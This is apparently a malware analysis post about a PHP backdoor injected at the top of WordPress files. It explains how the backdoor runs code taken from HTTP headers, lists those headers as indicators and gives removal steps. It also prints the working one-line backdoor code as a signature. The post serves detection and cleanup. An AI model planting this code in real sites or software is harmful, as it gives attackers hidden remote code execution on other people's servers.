Technical Analysis
The malware is a 'Header-Based Backdoor' injected into PHP files at the beginning, following the '<?php' tag. It leverages HTTP headers to execute malicious code. Specifically, it leverages 'X-Dns-Prefetch-Control' to dynamically create a function (likely using 'create_function'), uses 'If-Unmodified-Since' to decode a payload with 'base64_decode', and 'Feature-Policy' to carry the encoded PHP payload/script. This allows attackers to execute arbitrary PHP code without leaving obvious footprints in the files themselves, as the malicious code is not stored on the server but activated via HTTP headers.
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
- A malicious request is sent with specific HTTP headers.
- The script checks for 'X-Dns-Prefetch-Control', 'If-Unmodified-Since', and 'Feature-Policy' headers.
- If the headers are present, 'create_function' is used to execute the payload decoded by 'base64_decode'.
Code Signature(s)
FILE: sample.php
$_HEADERS=getallheaders();if(isset($_HEADERS['X-Dns-Prefetch-Control'])){$mb_convert=$_HEADERS['X-Dns-Prefetch-Control']('', $_HEADERS['If-Unmodified-Since']($_HEADERS['Feature-Policy']));$mb_convert();}
Indicators of Compromise (IOCs)
X-Dns-Prefetch-ControlIf-Unmodified-SinceFeature-Policy
Removal Protocol
- Scan all PHP files in active themes and plugins to locate the injected backdoor code.
- Remove the malicious code from the top of affected PHP files.
- Update WordPress, themes, and plugins to the latest versions to patch vulnerabilities.
Status: Active Threat.
Verification: Verified by MD Pabel.
Top comments (0)